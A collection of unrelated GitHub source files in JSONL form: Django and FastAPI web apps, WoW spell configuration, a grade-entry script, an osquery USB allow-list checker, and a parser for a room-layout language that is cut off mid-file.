+{"seq_id":"11707514142","text":"from django.contrib import admin\nfrom import_export.admin import ImportExportModelAdmin\n\n# Register your models here.\nfrom apps.data.models import DailyData, Instrument\n\n\n@admin.register(Instrument)\nclass Instrument(admin.ModelAdmin):\n list_display = (\n \"ticker\",\n )\n list_filter = (\n \"ticker\",\n )\n\n@admin.register(DailyData)\nclass DailyData(ImportExportModelAdmin, admin.ModelAdmin):\n list_display = (\n \"instrument\",\n \"date\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"volume\",\n )\n list_filter = (\n \"instrument__ticker\",\n )\n","repo_name":"webclinic017/trading_deploy","sub_path":"apps/data/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22575184078","text":"\"\"\"Define the Shaman Class its Specs and Spells.\"\"\"\r\n# pylint: disable=line-too-long\r\n# pylint: disable=bad-whitespace\r\n# pylint: disable=wildcard-import\r\n# pylint: disable=unused-wildcard-import\r\n# fmt: off\r\n\r\n# IMPORT LOCAL LIBRARIES\r\nfrom lorgs.data.constants import *\r\nfrom lorgs.data.roles import *\r\nfrom lorgs.models import warcraftlogs_actor\r\nfrom lorgs.models.wow_class import WowClass\r\nfrom lorgs.models.wow_spec import WowSpec\r\nfrom lorgs.models.wow_spell import SpellTag, SpellType\r\n\r\n\r\n################################################################################\r\n# Class\r\n#\r\nSHAMAN = WowClass(id=7, name=\"Shaman\", color=\"#0070DD\")\r\n\r\n################################################################################\r\n# Specs\r\n#\r\nSHAMAN_ELEMENTAL = WowSpec(role=RDPS, wow_class=SHAMAN, name=\"Elemental\")\r\nSHAMAN_ENHANCEMENT = WowSpec(role=MDPS, wow_class=SHAMAN, name=\"Enhancement\")\r\nSHAMAN_RESTORATION = WowSpec(role=HEAL, wow_class=SHAMAN, name=\"Restoration\", short_name=\"Resto\")\r\n\r\n################################################################################\r\n# Spells\r\n#\r\n# SHAMAN.add_spell( spell_id=320674, cooldown=90, color=COL_VENTR, name=\"Chain Harvest\", icon=\"ability_revendreth_shaman.jpg\", show=False)\r\n# SHAMAN.add_spell( spell_id=328923, cooldown=120, duration=3, color=COL_NF, name=\"Fae Transfusion\", icon=\"ability_ardenweald_shaman.jpg\", show=True)\r\nSHAMAN.add_spell( spell_id=375982, cooldown=45, color=COL_NECRO, name=\"Primordial Wave\", icon=\"ability_maldraxxus_shaman.jpg\", show=False)\r\n\r\n# Utils\r\nSHAMAN.add_spell( spell_id=108281, cooldown=120, duration=10, name=\"Ancestral Guidance\", icon=\"ability_shaman_ancestralguidance.jpg\", show=False)\r\nSHAMAN.add_spell( spell_id=192077, cooldown=120, duration=15, name=\"Windrush Totem\", icon=\"ability_shaman_windwalktotem.jpg\", show=False)\r\n\r\n# Defensives\r\nSHAMAN.add_spell( spell_id=21169, name=\"Reincarnation\", icon=\"spell_shaman_improvedreincarnation.jpg\", show=False)\r\nSHAMAN.add_spell( spell_id=108271, cooldown=90, duration=12, name=\"Astral Shift\", icon=\"ability_shaman_astralshift.jpg\", show=False)\r\nSHAMAN.add_buff( spell_id=337984, cooldown=90, duration=12, name=\"Vital Accretion\", icon=\"ability_accretion.jpg\", show=False) # Earth Ele HP Increase Conduit\r\n\r\n\r\n# Offensive\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=191634, cooldown=60, color=\"#00bfff\", name=\"Stormkeeper\", icon=\"ability_thunderking_lightningwhip.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=198067, cooldown=150, duration=30, color=\"#ffa500\", name=\"Fire Elemental\", icon=\"spell_fire_elemental_totem.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=192249, cooldown=150, duration=30, color=\"#64b8d9\", name=\"Storm Elemental\", icon=\"inv_stormelemental.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=108281, cooldown=120, duration=10, color=\"#64b8d9\", name=\"Ancestral Guidance\", icon=\"ability_shaman_ancestralguidance.jpg\", spell_type=SpellType.RAID, tags=[SpellTag.RAID_CD], show=False)\r\nSHAMAN_ELEMENTAL.add_buff( spell_id=114050, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\") # The Buff\r\n\r\n\r\nSHAMAN_ENHANCEMENT.add_spell( spell_id=51533, cooldown=120, name=\"Feral Spirit\", icon=\"spell_shaman_feralspirit.jpg\")\r\nSHAMAN_ENHANCEMENT.add_buff( spell_id=335903, cooldown=60, duration=12, color=\"#42bff5\", name=\"Doom Winds\", 
icon=\"ability_ironmaidens_swirlingvortex.jpg\")\r\nSHAMAN_ENHANCEMENT.add_buff( spell_id=114051, cooldown=180, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\") # The Buff\r\n\r\n\r\nSHAMAN_RESTORATION.add_spell( spell_id=108280, cooldown=180, duration=10, name=\"Healing Tide Totem\", icon=\"ability_shaman_healingtide.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=98008, cooldown=180, duration=6, color=\"#24b385\", name=\"Spirit Link Totem\", icon=\"spell_shaman_spiritlink.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=16191, cooldown=180, duration=8, color=COL_MANA, name=\"Mana Tide Totem\", icon=\"spell_frost_summonwaterelemental.jpg\", show=False, tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=207399, cooldown=300, duration=30, color=\"#d15a5a\", name=\"Ancestral Protection Totem\", icon=\"spell_nature_reincarnation.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=198838, cooldown=60, duration=15, color=\"#a47ea6\", name=\"Earthen Wall Totem\", icon=\"spell_nature_stoneskintotem.jpg\", show=False)\r\nSHAMAN_RESTORATION.add_spell( spell_id=157153, cooldown=30, duration=15, color=\"#96d0eb\", name=\"Cloudburst Totem\", icon=\"ability_shaman_condensationtotem.jpg\", show=False)\r\n\r\n\r\nSHAMAN_RESTORATION.add_buff( spell_id=114052, cooldown=180, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_buff( spell_id=378270, color=\"#ffcb6b\", name=\"Ascendance (DRE Proc)\", icon=\"inv_misc_herb_liferoot_stem.jpg\", query=False, show=False)\r\n\r\n\r\ndef split_ascendance_procs(actor: warcraftlogs_actor.BaseActor, status: str):\r\n if status != \"success\":\r\n return\r\n if not actor:\r\n return\r\n \r\n for cast in actor.casts:\r\n if cast.spell_id == 114052 and cast.duration and cast.duration < 10_000: # real = 15sec / procs = 6sec\r\n cast.spell_id = 378270\r\n\r\nwarcraftlogs_actor.BaseActor.event_actor_load.connect(split_ascendance_procs)\r\n","repo_name":"gitarrg/lorgs","sub_path":"lorgs/data/classes/shaman.py","file_name":"shaman.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"34916691572","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom .models import Material, Cart, CartMaterial\nfrom .forms import MaterialForm, MaterialSearchForm\n# Create your views here.\n\ndef inicio(request):\n return render(request, 'paginas/index.html')\n\ndef nosotros(request):\n return render(request, 'paginas/nosotros.html')\n\ndef servicios(request):\n return render(request, 'paginas/servicios.html')\n\ndef contacto(request):\n return render(request, 'paginas/contacto.html')\n\ndef presupuesto(request):\n material = Material.objects.all()\n session_key = request.session.session_key\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n try:\n cart = Cart.objects.get(session_key=session_key)\n except Cart.DoesNotExist:\n cart = Cart.objects.create(session_key=session_key)\n\n cart_material = CartMaterial.objects.filter(cart=cart)\n\n return render(request, 'paginas/presupuesto.html', {'material': material, 'cart_material': cart_material})\n\ndef add_to_budget(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n\n cart, created = Cart.objects.get_or_create(session_key=session_key)\n\n try: \n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n cart_material.quantity += 1\n cart_material.save()\n except CartMaterial.DoesNotExist:\n CartMaterial.objects.create(cart=cart, material=material, quantity=1)\n\n return redirect('presupuesto')\n\ndef remove_from_budget_presupuesto(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n cart = Cart.objects.get(session_key=session_key)\n\n try:\n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n if cart_material.quantity > 1:\n cart_material.quantity -= 1\n cart_material.save()\n else:\n cart_material.delete()\n except CartMaterial.DoesNotExist:\n pass\n\n return redirect('presupuesto')\n\ndef factura(request):\n session_key = request.session.session_key\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n try:\n cart = Cart.objects.get(session_key=session_key)\n except Cart.DoesNotExist:\n cart = Cart.objects.create(session_key=session_key)\n\n cart_material = CartMaterial.objects.filter(cart=cart)\n total = sum(item.material.precio * item.quantity for item in cart_material)\n\n return render(request, 'paginas/factura.html', {'cart_material': cart_material, 'total': total})\n\ndef add_to_budget_factura(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n\n cart, created = Cart.objects.get_or_create(session_key=session_key)\n\n try: \n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n cart_material.quantity += 1\n cart_material.save()\n except CartMaterial.DoesNotExist:\n CartMaterial.objects.create(cart=cart, material=material, quantity=1)\n\n return redirect('factura') \n\ndef remove_from_budget(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n 
cart = Cart.objects.get(session_key=session_key)\n\n try:\n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n if cart_material.quantity > 1:\n cart_material.quantity -= 1\n cart_material.save()\n else:\n cart_material.delete()\n except CartMaterial.DoesNotExist:\n pass\n\n return redirect('factura')\n\n@login_required\ndef materiales(request):\n materiales = Material.objects.all()\n form = MaterialSearchForm(request.GET)\n\n if form.is_valid():\n search_term = form.cleaned_data['search_term']\n if search_term:\n materiales = materiales.filter(nombre__icontains=search_term)\n\n return render(request, 'materiales/index.html', {'materiales': materiales, 'form': form})\n@login_required\ndef crear(request):\n formulario = MaterialForm(request.POST or None, request.FILES or None)\n if formulario.is_valid():\n formulario.save()\n return redirect('materiales')\n return render(request, 'materiales/crear.html', {'formulario': formulario})\n@login_required\ndef editar(request, id):\n material = Material.objects.get(id=id)\n formulario = MaterialForm(request.POST or None, request.FILES or None, instance=material)\n if formulario.is_valid() and request.method == 'POST':\n formulario.save()\n return redirect('materiales')\n return render(request, 'materiales/editar.html', {'formulario': formulario})\n@login_required\ndef eliminar(request, id):\n material = Material.objects.get(id=id)\n material.delete()\n return redirect('materiales')\n\ndef exit(request):\n logout(request)\n return redirect('inicio')","repo_name":"Kukulkek/ConstructionWebsite","sub_path":"pagina/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"30892755355","text":"# Grade entry program\nwith open('scorelist.txt', 'a') as f:\n # key = ''\n while True:\n try:\n key = input(\"Save the grades? [y/n] : \")\n if key == 'y' or key == 'Y':\n break\n elif key == 'n' or key == 'N':\n name = input(\"Enter name : \")\n kor = int(input(\"Korean score : \"))\n math = int(input(\"Math score : \"))\n #avg = (kor + math) / 2\n\n f.write(name + ' ')\n f.write(str(kor) + ' ')\n f.write(str(math) + '\\n')\n #f.write(str(avg) + '\\n')\n else:\n print(\"Invalid input. Please enter again.\")\n except ValueError:\n print(\"Invalid input. Please enter again.\")\n print(\"Ending input.\")\n\nwith open('scorelist.txt', 'r') as f:\n scorelist = f.read()\n print(scorelist)","repo_name":"kimheeje12/pyworks","sub_path":"ch08/score/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"16669305124","text":"from fastapi import APIRouter, Response ## split routes\nfrom starlette.status import HTTP_201_CREATED, HTTP_204_NO_CONTENT\nfrom schema.trailer_schema import TrailerSchema\nfrom config.db import engine\nfrom model.trailer_model import trailers\nfrom typing import List\nimport json\n\ntrailer = APIRouter()\n\n# @trailer.get(\"/\")\n# def root():\n# return \"Hi I Am Trucks Route\"\n\n@trailer.get(\"/api/trailer\")\ndef get_trailers():\n with engine.connect() as conn:\n result = conn.execute(trailers.select()).fetchall()\n conn.commit()\n return json.dumps(result, default=str)\n\n\n@trailer.get(\"/api/trailer/{trailer_id}\")\ndef get_trailer(trailer_id: int):\n with engine.connect() as conn:\n result = conn.execute(trailers.select().where(trailers.c.id == trailer_id)).first()\n conn.commit()\n return {\n \"success\": True,\n \"data\": json.dumps(result, default=str)\n }\n \n\n@trailer.post(\"/api/trailer\", status_code=HTTP_201_CREATED)\ndef create_trailer(data_trailer: TrailerSchema):\n with engine.connect() as conn:\n new_trailer = data_trailer.model_dump()\n conn.execute(trailers.insert().values(new_trailer))\n conn.commit()\n return Response(status_code=HTTP_201_CREATED)\n\n\n@trailer.put(\"/api/trailer/{trailer_id}\")\ndef update_trailer(data_update: TrailerSchema, trailer_id: int):\n with engine.connect() as conn:\n conn.execute(trailers.update().values(trailer_type=data_update.trailer_type, number_plate=data_update.number_plate, capacity=data_update.capacity, status=data_update.status, cargo_type = data_update.cargo_type).where(trailers.c.id == trailer_id))\n conn.commit()\n\n result = conn.execute(trailers.select().where(trailers.c.id == trailer_id)).first()\n\n return {\n \"success\": True,\n \"data\": json.dumps(result, default=str)\n }\n \n@trailer.delete(\"/api/trailer/{trailer_id}\", status_code=HTTP_204_NO_CONTENT)\ndef delete_trailer(trailer_id: int):\n with engine.connect() as conn:\n conn.execute(trailers.delete().where(trailers.c.id == trailer_id))\n conn.commit()\n\n return Response(status_code=HTTP_204_NO_CONTENT)\n\n ","repo_name":"Tiwar02/transporteCarga","sub_path":"router/trailer_router.py","file_name":"trailer_router.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549897919","text":"import constants\nfrom analysis import SecurityIssueTypes\nfrom analysis.Recommendation import Recommendation\nfrom analysis.SecurityIssue import SecurityIssue\nfrom handler.DatabaseHandler import DatabaseHandler\nfrom handler.HostInformation import HostInformation\n\n\n# Analysis class for osquery security issues. Osquery needs to be installed on the checked host.\nclass OsqueryAnalyser:\n def __init__(self, configuration):\n self.configuration = configuration\n self.database_handler = DatabaseHandler(constants.MONGO_URI).mongo[constants.PI_DATABASE_NAME][constants.OSQUERY_AND_COLLECTION_NAME_USB_DEVICES]\n\n # Check for unknown USB devices connected to a host.\n def check_connected_usb_devices(self, host: HostInformation):\n # get distinct serial numbers of previously seen USB devices from the database\n distinct_usb_serials = self.database_handler.distinct('columns.serial', {'host_ip': host.ip})\n\n # find the last status of each usb device\n connected_usbs = []\n for serial in distinct_usb_serials:\n entries = self.database_handler.find({'host_ip': host.ip, 'columns.serial': serial})\\\n .sort('unixTime', -1).limit(1)\n\n for entry in entries:\n # check if usb stick was added (= connected)\n if entry.get('action') == 'added':\n connected_usbs.append(entry)\n break\n\n # check for security issues\n unknown_usbs = self.compare_connected_usbs_with_configuration(connected_usbs)\n\n # check if empty\n if unknown_usbs:\n # description building\n usbs_display = ', '.join([usb[\"columns\"][\"model\"] for usb in connected_usbs if usb[\"columns\"][\"model\"] is not None])\n description = 'Connected USB(s): ' + usbs_display + '. Found unknown USB(s): '\n unknown_usbs_display = ', '.join([usb[\"columns\"][\"model\"] for usb in unknown_usbs if usb[\"columns\"][\"model\"] is not None])\n\n description += unknown_usbs_display\n\n # build recommendation\n recommendation = Recommendation(constants.OSQUERY,\n description,\n 'Disconnect unknown USB(s): ' + unknown_usbs_display)\n return SecurityIssue(SecurityIssueTypes.OSQUERY_CONNECTED_USBS,\n recommendation,\n False)\n else:\n # no security issues found\n print('Unknown USB check on ' + host.ip + ': Found ' + str(connected_usbs) + '! STATUS OK')\n return None\n\n # Search for usb device differences with the configuration\n def compare_connected_usbs_with_configuration(self, connected_usbs):\n # get allowlisted usb devices\n allowlisted = self.configuration['allow_list_usbs'].split(\"\\n\")\n allowlisted = [usb_name.strip() for usb_name in allowlisted]\n\n # check if in allowlist\n not_allowlisted = []\n for usb in connected_usbs:\n if not usb[\"columns\"][\"model\"] in allowlisted:\n not_allowlisted.append(usb)\n\n return not_allowlisted\n","repo_name":"Ric1234567/DigitalTwinsForIoTSecurityManagement","sub_path":"flask-backend/analysis/osquery/OsqueryAnalyser.py","file_name":"OsqueryAnalyser.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"28492982144","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image, ImageDraw\n\n\nclass Const:\n WHITE = (255,) * 3\n BLACK = (0,) * 3\n GRAY_NORMAL = (128,) * 3\n GRAY_LIGHT = (200,) * 3\n GRAY_DARK = (75,) * 3\n RED_NORMAL = (255, 0, 0)\n RED_DARK = (75, 0, 0)\n CELL_SIZE = 32\n ROOM_SIZE = 9\n\n\nclass Variable:\n def __init__(self, name, value, linen):\n self.name = name\n self.value = value\n self.linen = linen\n\n\nclass Cable:\n def __init__(self, room_uid, size, start, end, vertical):\n self.room_uid = room_uid\n self.size = int(size)\n self.start = start\n self.end = end\n self.is_vertical = vertical\n\n\nclass Box:\n def __init__(self, room_uid, name, anchor, color):\n self.room_uid = room_uid\n self.name = name\n self.anchor = anchor\n self.color = color\n\n\nclass Door:\n def __init__(self, room_uid, on, at):\n self.room_uid = room_uid\n self.on = on\n self.at = int(at)\n\n\nclass Room:\n def __init__(\n self,\n uid,\n width,\n height,\n anchor,\n boxes,\n cables,\n doors,\n ):\n self.uid = uid\n self.width = int(width)\n self.height = int(height)\n self.anchor = anchor\n self.boxes = boxes if boxes else []\n self.cables = cables if cables else []\n self.doors = doors if doors else []\n\n\ndef parseMacros(src):\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n macroless_src = []\n macros = {}\n current_macro = None\n for line in lines:\n if line.startswith(\"new macro\"):\n if not \"equals\" in line:\n assert False, \"Invalid macro syntax\"\n current_macro = line.split(\" \")[2]\n if current_macro == \"new\":\n assert False, 'Macro cannot be called \"new\"'\n keywords = line.split(\" \")[1::2]\n values = line.split(\" \")[2::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n if \"params\" in zipped:\n macros[current_macro] = {\n \"lines\": [],\n \"params\": zipped[\"params\"].split(\",\")\n if \",\" in zipped[\"params\"]\n else [\n zipped[\"params\"],\n ],\n }\n else:\n macros[current_macro] = {\"lines\": [], \"params\": []}\n continue\n if line.startswith(\"stop macro \" + str(current_macro)):\n current_macro = \"\"\n continue\n if not current_macro:\n macroless_src.append(line)\n else:\n macros[current_macro][\"lines\"].append(line)\n\n macroed_src = []\n for line in macroless_src:\n for k, v in macros.items():\n if line.startswith(k):\n keywords = line.split(\" \")[1::2]\n values = line.split(\" \")[2::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n line = \"\\n\".join(v[\"lines\"])\n for p in v[\"params\"]:\n line = line.replace(\"@\" + p + \"@\", zipped[p])\n macroed_src.append(line + \"\\n\")\n\n return macroed_src\n\n\ndef parseLoops(lines):\n looped_src = []\n current_index = None\n current_times = 0\n done = False\n met_loops = 0\n i = 0\n while not done:\n if i >= len(lines):\n done = True\n continue\n line = lines[i]\n if current_index:\n l = 1\n for j in range(current_times):\n l = 1\n met_loops = 1\n while True:\n loop_line = lines[i + l]\n if loop_line.startswith(\"new loop\"):\n met_loops += 1\n if loop_line.startswith(\"stop loop\"):\n met_loops -= 1\n if loop_line.startswith(\"stop loop\") and met_loops <= 1:\n looped_src.append(loop_line)\n break\n replaced = (\n loop_line.replace(\"@\" + current_index + \"@\", str(j)) + \"\\n\"\n )\n looped_src.append(replaced)\n l += 1\n for k in range(i + l + 1, len(lines)):\n looped_src.append(lines[k])\n break\n if line.startswith(\"new loop\"):\n if not all([keyword in line for keyword in [\"times\", \"index\", \"equals\"]]):\n assert 
False, \"Invalid loop syntax\"\n met_loops = 1\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n if int(zipped[\"times\"]) < 0:\n assert False, \"Loop cannot run less than 0 times\"\n current_index = zipped[\"index\"]\n current_times = int(zipped[\"times\"])\n elif line.startswith(\"stop loop\"):\n current_index = None\n i += 1\n else:\n looped_src.append(line)\n i += 1\n\n return looped_src\n\n\ndef parseConditionals(lines):\n i = 0\n done = False\n keep_if = False\n inside_if = False\n inside_else = False\n conditioned_src = []\n met_conditionals = 0\n while not done:\n if i >= len(lines):\n done = True\n continue\n line = lines[i]\n if inside_if:\n if keep_if:\n l = 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if (\n any(\n [\n lines[i + l].startswith(cond)\n for cond in [\"else\", \"stop if\"]\n ]\n )\n and met_conditionals <= 1\n ):\n break\n conditioned_src.append(lines[i + l])\n l += 1\n l += 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if lines[i + l].startswith(\"stop if\") and met_conditionals <= 1:\n break\n l += 1\n for k in range(i + l + 1, len(lines)):\n conditioned_src.append(lines[k])\n else:\n l = 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if (\n any(\n [\n lines[i + l].startswith(cond)\n for cond in [\"else\", \"stop if\"]\n ]\n )\n and met_conditionals <= 1\n ):\n break\n l += 1\n l += 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if lines[i + l].startswith(\"stop if\") and met_conditionals <= 1:\n break\n conditioned_src.append(lines[i + l])\n l += 1\n for k in range(i + l + 1, len(lines)):\n conditioned_src.append(lines[k])\n break\n if line.startswith(\"new if\"):\n if not any(\n [\n keyword in line\n for keyword in [\n \"equals\",\n ]\n ]\n ):\n assert False, \"Invalid conditional syntax\"\n met_conditionals = 1\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n inside_if = True\n inside_else = False\n if \"greater\" in zipped:\n if int(zipped[\"greater\"]) > int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"greater-equal\" in zipped:\n if int(zipped[\"greater-equal\"]) >= int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"lesser\" in zipped:\n if int(zipped[\"lesser\"]) < int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"lesser-equal\" in zipped:\n if int(zipped[\"lesser-equal\"]) <= int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"same\" in zipped:\n if int(zipped[\"same\"]) == int(zipped[\"and\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"different\" in zipped:\n if int(zipped[\"different\"]) != int(zipped[\"and\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"multiple\" in zipped:\n if int(zipped[\"multiple\"]) % int(zipped[\"of\"]) == 0:\n keep_if = True\n else:\n keep_if = False\n else:\n assert False, \"Unknown condition\"\n else:\n conditioned_src.append(line)\n i += 1\n\n return conditioned_src\n\n\ndef handleVariables(value, linen):\n global variables\n\n to_skip = []\n for 
variable in variables:\n for secondVar in variables:\n if (\n secondVar.name == variable.name\n and secondVar.linen > variable.linen\n and linen >= secondVar.linen\n ):\n to_skip.append(variable)\n\n for variable in variables:\n if variable in to_skip:\n continue\n if value.strip() == \"@\" + variable.name + \"@\":\n return variable.value\n\n return value\n\n\ndef setVariables(varrs):\n global variables\n variables = varrs\n\n\ndef parseRooms(src):\n global variables\n\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n h = lambda v, l: handleVariables(v, l)\n ROOMS = []\n for i, line in enumerate(lines):\n if line.startswith(\"new room\"):\n if not all(\n [keyword in line for keyword in [\"id\", \"width\", \"height\", \"anchor\"]]\n ):\n assert False, 'Invalid room creation syntax: \"' + line + '\"'\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: h(v, i) for k, v in zip(keywords, values)}\n BOXES = parseBoxesForRoom(src, zipped[\"id\"])\n CABLES = parseCablesForRoom(src, zipped[\"id\"])\n DOORS = parseDoorsForRoom(src, zipped[\"id\"])\n ROOMS.append(\n Room(\n zipped[\"id\"],\n zipped[\"width\"],\n zipped[\"height\"],\n [int(h(n, i)) for n in h(zipped[\"anchor\"], i).split(\",\")],\n BOXES,\n CABLES,\n DOORS,\n )\n )\n\n return ROOMS\n\n\ndef parseAny(src, start, required, lambda_checks, lambda_generate, addLine=False):\n global variables\n\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n OBJS = []\n for i, line in enumerate(lines):\n if line.startswith(start):\n if not all([keyword in line for keyword in required]):\n assert False, 'Invalid creation syntax: \"' + line + '\"'\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {\n k: handleVariables(v, i) if variables else v\n for k, v in zip(keywords, values)\n }\n if lambda_checks and lambda_checks[-1].__name__ == \"same_room\":\n if not lambda_checks[-1](zipped):\n continue\n for check in lambda_checks[:-1]:\n assert check(zipped), (\n 'Check failed: \"'\n + check.__name__\n + '\" with values \"'\n + str(zipped)\n + '\"'\n )\n if not addLine:\n OBJS.append(lambda_generate(zipped))\n else:\n OBJS.append(lambda_generate(zipped, i))\n\n return OBJS\n\n\ndef parseAnyForRoom(\n src, room, start, required, lambda_checks, lambda_generate, addLine=False\n):\n def same_room(zipped):\n return zipped[\"room\"] == room\n\n return parseAny(\n src, start, required, (*lambda_checks, same_room), lambda_generate, addLine\n )\n\n\ndef parseBoxesForRoom(src, room):\n start = \"new box\"\n required = [\"room\", \"name\", \"anchor\"]\n\n def correct_color(zipped):\n if not \"color\" in zipped:\n zipped[\"color\"] = \"120,120,120\"\n zipped[\"color\"] = [int(n) for n in zipped[\"color\"].split(\",\")]\n return True\n\n checks = [\n correct_color,\n ]\n\n def generate(zipped):\n return Box(\n zipped[\"room\"],\n zipped[\"name\"],\n [int(n) for n in zipped[\"anchor\"].split(\",\")],\n zipped[\"color\"],\n )\n\n return parseAnyForRoom(src, room, start, required, checks, generate)\n\n\ndef parseDoorsForRoom(src, room):\n start = \"new door\"\n required = [\"room\", \"on\", \"at\"]\n\n def validate_positions(zipped):\n if zipped[\"on\"] not in [\"left\", \"right\", \"top\", \"bottom\"]:\n return False\n return True\n\n checks = [\n validate_positions,\n ]\n\n def generate(zipped):\n return Door(zipped[\"room\"], zipped[\"on\"], zipped[\"at\"])\n\n return parseAnyForRoom(src, room, start, required, checks, 
generate)\n\n\ndef parseCablesForRoom(src, room):\n start = \"new cable\"\n required = [\"room\", \"type\", \"size\", \"from\", \"to\"]\n\n def validate_type(zipped):\n if zipped[\"type\"] not in [\"V\", \"H\"]:\n return False\n return True\n\n def validate_malformed_cables(zipped):\n if zipped[\"type\"] == \"V\":\n if [int(n) for n in zipped[\"from\"].split(\",\")][0] != [\n int(n) for n in zipped[\"to\"].split(\",\")\n ][0]:\n return False\n else:\n if [int(n) for n in zipped[\"from\"].split(\",\")][1] != [\n int(n) for n in zipped[\"to\"].split(\",\")\n ][1]:\n return False\n return True\n\n def validate_size(zipped):\n if int(zipped[\"size\"]) <= 0:\n return False\n return True\n\n checks = [validate_type, validate_malformed_cables, validate_size]\n\n def generate(zipped):\n return Cable(\n zipped[\"room\"],\n zipped[\"size\"],\n [int(n) for n in zipped[\"from\"].split(\",\")],\n [int(n) for n in zipped[\"to\"].split(\",\")],\n zipped[\"type\"] == \"V\",\n )\n\n return parseAnyForRoom(src, room, start, required, checks, generate)\n\n\ndef parseVariables(src):\n start = \"set var\"\n required = [\"name\", \"value\"]\n checks = []\n\n def generate(zipped, linen):\n return Variable(zipped[\"name\"], zipped[\"value\"], linen)\n\n return parseAny(src, start, required, checks, generate, True)\n\n\ndef parseMath(src):\n start = \"do math\"\n required = [\"by\", \"into\"]\n\n def validate_operators(zipped):\n if not any([op in zipped for op in [\"times\", \"divide\", \"sum\", \"subtract\"]]):\n return False\n return True\n\n checks = [\n validate_operators,\n ]\n\n def generate(zipped, linen):\n global variables\n if \"times\" in zipped:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"times\"]) * int(zipped[\"by\"]), linen\n )\n )\n elif \"divide\" in zipped:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"divide\"]) // int(zipped[\"by\"]), linen\n )\n )\n elif \"sum\" in zipped:\n variables.append(\n Variable(zipped[\"into\"], int(zipped[\"sum\"]) + int(zipped[\"by\"]), linen)\n )\n else:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"subtract\"]) - int(zipped[\"by\"]), linen\n )\n )\n\n return parseAny(src, start, required, checks, generate, True)\n\n\ndef drawRooms(rooms):\n for room in rooms:\n drawRoom(room)\n 